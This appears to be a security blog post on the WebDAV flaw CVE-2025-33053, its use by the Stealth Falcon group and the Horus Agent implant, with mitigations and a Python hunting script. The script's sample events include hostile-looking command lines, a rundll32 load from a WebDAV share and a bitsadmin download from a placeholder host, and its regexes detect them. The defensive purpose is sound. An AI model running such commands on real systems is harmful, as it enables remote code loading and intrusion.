🧩 1. What is CVE‑2025‑33053?
In March 2025, security researchers at Check Point identified a zero‑day vulnerability in Microsoft’s WebDAV implementation. Tracked as CVE‑2025‑33053 (CVSS 8.8), it allows attackers to execute remote code by manipulating Windows' working directory while interacting with malicious .url files hosted on WebDAV servers.
Microsoft patched it during June’s Patch Tuesday (June 10) across all supported—and even some out-of-support—Windows versions.
🎯 2. Enter Stealth Falcon
Stealth Falcon (a.k.a. Fruity Armor or Project Raven) is a UAE‑linked APT group active since at least 2012. They’ve targeted Emirati dissidents, journalists, government, and defense bodies across the Middle East and Africa—especially in Turkey, Qatar, Egypt, and Yemen.
Their typical attack chain:
- Spear‑phishing emails carrying deceptive .url files or links.
- The user clicks, which triggers CVE‑2025‑33053; code execution arrives over WebDAV and is sustained through stealthy built‑in Windows binaries (LOLBins).
- Deploy advanced implants, including one known as “Horus Agent.”
🦅 3. Horus: A Mythic C2 Implant
Post‑exploit, Stealth Falcon deploys malware tied to the open‑source Mythic C2 framework, specifically a custom backdoor dubbed Horus Agent—named after the Egyptian sky god, echoing their avian theme.
Key capabilities:
- Module‑based operation: Downloads functionalities dynamically (keylogger, credential dumper, file reader).
- Living‑off‑the‑land (LOLBins) use to evade security tools.
- Anti‑analysis features including sandbox evasion and encrypted communications.
🛡️ 4. The “Deadglyph” Connection
Earlier, in 2023, ESET documented “Deadglyph,” another advanced Stealth Falcon implant that uses homoglyph tricks (e.g., spoofing “Microsoft Corporation”) and a modular architecture—a harbinger of Horus’s sophistication.
🌍 5. Implications & Mitigation
| Risk | Recommendation |
|---|---|
| Government/defense targets in ME/Africa | Enforce phishing defenses; patch WebDAV CVE‑2025‑33053 urgently |
| Implant spread via phishing | Monitor for suspicious .url/LOLBin use; implement UEBA and network segmentation |
| Dynamic implants | Employ endpoint detection, XDR, and threat-hunting pipelines (YARA, grep filters, etc.) |
- Patch immediately—including legacy OS like Windows 8/Server 2012, given Microsoft’s broad patch coverage.
- Enhance email filtering and train users to spot spear-phishing.
- Enable threat hunting: watch for unusual WebDAV calls, suspicious .url file behaviour, and abnormal process patterns (e.g., rundll32, bitsadmin).
- Invest in XDR/EPP solutions to catch stealthy C2 and module-based tools like Horus.
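As an added illustration of the hunting bullet above (example code written for this post, not Check Point's, ESET's or any vendor's detection logic), here is a small Python filter that applies those indicators to process-creation events: LOLBins such as rundll32/bitsadmin whose command line references a WebDAV UNC path or a remote URL, and any process handed a .url file. The simplified "parent -> image : command line" event format, the sample hosts (RFC 5737 documentation addresses) and the two-entry LOLBin list are assumptions for the example; in practice you would feed it Sysmon Event ID 1 or EDR process telemetry.

```python
import re
from dataclasses import dataclass

# Constructed sample events (not real telemetry): "parent -> image : command line".
SAMPLE_EVENTS = [
    r"explorer.exe -> rundll32.exe : rundll32.exe \\203.0.113.10@80\DavWWWRoot\lib.dll,Entry",
    r"outlook.exe -> explorer.exe : explorer.exe C:\Users\a\Downloads\invoice.url",
    r"svchost.exe -> bitsadmin.exe : bitsadmin.exe /transfer j http://203.0.113.10/x.bin C:\Temp\x.bin",
    r"cmd.exe -> rundll32.exe : rundll32.exe shell32.dll,Control_RunDLL",
    r"explorer.exe -> notepad.exe : notepad.exe C:\notes.txt",
]

LOLBINS = {"rundll32.exe", "bitsadmin.exe"}  # assumed short list for the example
# The WebClient (WebDAV) redirector maps remote shares to \\host@80\share or
# \\host@SSL@443\share; DavWWWRoot is the usual share name.
WEBDAV_UNC = re.compile(r"\\\\[\w.\-]+@(?:SSL@)?\d+\\", re.IGNORECASE)
URL_FILE = re.compile(r"\S+\.url\b", re.IGNORECASE)
REMOTE_URL = re.compile(r"\bhttps?://", re.IGNORECASE)

@dataclass
class Finding:
    parent: str
    image: str
    severity: str
    reasons: list

def parse_event(line):
    parent, rest = line.split(" -> ", 1)
    image, cmdline = rest.split(" : ", 1)
    return parent.strip(), image.strip(), cmdline.strip()

def assess(line):
    # Return a Finding for a suspicious event, or None for a benign one.
    parent, image, cmdline = parse_event(line)
    is_lolbin = image.lower() in LOLBINS
    reasons = []
    if is_lolbin and WEBDAV_UNC.search(cmdline):
        reasons.append("lolbin-loading-from-webdav")  # strongest signal
    if is_lolbin and REMOTE_URL.search(cmdline):
        reasons.append("lolbin-fetching-remote-url")
    if URL_FILE.search(cmdline):
        reasons.append("url-shortcut-opened")  # context, not proof by itself
    if not reasons:
        return None
    severity = ("high" if "lolbin-loading-from-webdav" in reasons
                else "medium" if is_lolbin else "low")
    return Finding(parent, image, severity, reasons)

def hunt(events):
    return [f for f in (assess(e) for e in events) if f is not None]
```

Run over the constructed events it flags the WebDAV rundll32 load as high, the bitsadmin download as medium and the opened .url file as low, while the two local-only events produce no finding.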
✍️ 6. Conclusion
CVE‑2025‑33053 is now weaponized by Stealth Falcon in a targeted, high-stakes espionage campaign aimed at Middle East defense and government entities. Their latest implant, Horus Agent, embodies stealth, modularity, and deep system compromise.
This saga reflects an evolving cyber threat landscape where nation-linked APTs quickly turn zero-days into full-scale spying operations. Organizations in the region must act now: patch diligently, fortify email defenses, and deploy vigilant detection to counter this persistent and sophisticated adversary.